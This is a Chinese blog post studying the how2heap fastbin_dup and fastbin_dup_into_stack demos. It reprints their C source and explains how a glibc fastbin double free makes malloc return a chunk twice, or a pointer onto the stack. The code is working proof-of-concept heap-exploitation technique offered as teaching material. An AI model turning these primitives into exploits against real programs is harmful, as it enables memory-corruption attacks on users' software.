标签:程序 cat end ddr while into str log 顺序
今天,让我们来总结下how2heap,之前粗略过了一下,但最近发现还是有很多细节不太清楚,于是现在回头来重新调试下how2heap。
就按顺序来吧。
0x01 fastbin_dup:
源码:
1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n"); 7 8 fprintf(stderr, "Allocating 3 buffers.\n"); 9 int *a = malloc(8); 10 int *b = malloc(8); 11 int *c = malloc(8); 12 13 fprintf(stderr, "1st malloc(8): %p\n", a); 14 fprintf(stderr, "2nd malloc(8): %p\n", b); 15 fprintf(stderr, "3rd malloc(8): %p\n", c); 16 17 fprintf(stderr, "Freeing the first one...\n"); 18 free(a); 19 20 fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a); 21 // free(a); 22 23 fprintf(stderr, "So, instead, we‘ll free %p.\n", b); 24 free(b); 25 26 fprintf(stderr, "Now, we can free %p again, since it‘s not the head of the free list.\n", a); 27 free(a); 28 29 fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we‘ll get %p twice!\n", a, b, a, a); 30 fprintf(stderr, "1st malloc(8): %p\n", malloc(8)); 31 fprintf(stderr, "2nd malloc(8): %p\n", malloc(8)); 32 fprintf(stderr, "3rd malloc(8): %p\n", malloc(8)); 33 }
接下来我们来运行下这个程序:
可以发现这是一个double free的分析,这个是fastbin内存分配的分析,fastbin是先入后出,free1 —— free2 —— free1,这样在使用的时候就是malloc1 —— malloc2 —— malloc1 — — malloc2 —— malloc1……循环下去,可以再分配试一试。
0x02 fastbin_dup_into_stack:
源码:
1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n" 7 "returning a pointer to a controlled location (in this case, the stack).\n"); 8 9 unsigned long long stack_var; 10 11 fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var); 12 13 fprintf(stderr, "Allocating 3 buffers.\n"); 14 int *a = malloc(8); 15 int *b = malloc(8); 16 int *c = malloc(8); 17 18 fprintf(stderr, "1st malloc(8): %p\n", a); 19 fprintf(stderr, "2nd malloc(8): %p\n", b); 20 fprintf(stderr, "3rd malloc(8): %p\n", c); 21 22 fprintf(stderr, "Freeing the first one...\n"); 23 free(a); 24 25 fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a); 26 // free(a); 27 28 fprintf(stderr, "So, instead, we‘ll free %p.\n", b); 29 free(b); 30 31 fprintf(stderr, "Now, we can free %p again, since it‘s not the head of the free list.\n", a); 32 free(a); 33 34 fprintf(stderr, "Now the free list has [ %p, %p, %p ]. " 35 "We‘ll now carry out our attack by modifying data at %p.\n", a, b, a, a); 36 unsigned long long *d = malloc(8); 37 38 fprintf(stderr, "1st malloc(8): %p\n", d); 39 fprintf(stderr, "2nd malloc(8): %p\n", malloc(8)); 40 fprintf(stderr, "Now the free list has [ %p ].\n", a); 41 fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n" 42 "so now we are writing a fake free size (in this case, 0x20) to the stack,\n" 43 "so that malloc will think there is a free chunk there and agree to\n" 44 "return a pointer to it.\n", a); 45 stack_var = 0x20; 46 47 fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a); 48 *d = (unsigned long long) (((char*)&stack_var) - sizeof(d)); 49 50 fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8)); 51 fprintf(stderr, "4th malloc(8): %p\n", malloc(8)); 52 }
接下来我们来运行下这个程序:
会发现再次申请的时候就把我们伪造的栈空间当malloc来申请了,这其中的要点为将stack_var = 0x20,然后将stack_var -8 的地址赋值到*d处,也就是fastbin的fd处。再次maollc到指向stack+8的堆。
标签:程序 cat end ddr while into str log 顺序
原文地址:http://www.cnblogs.com/Yable/p/8000991.html
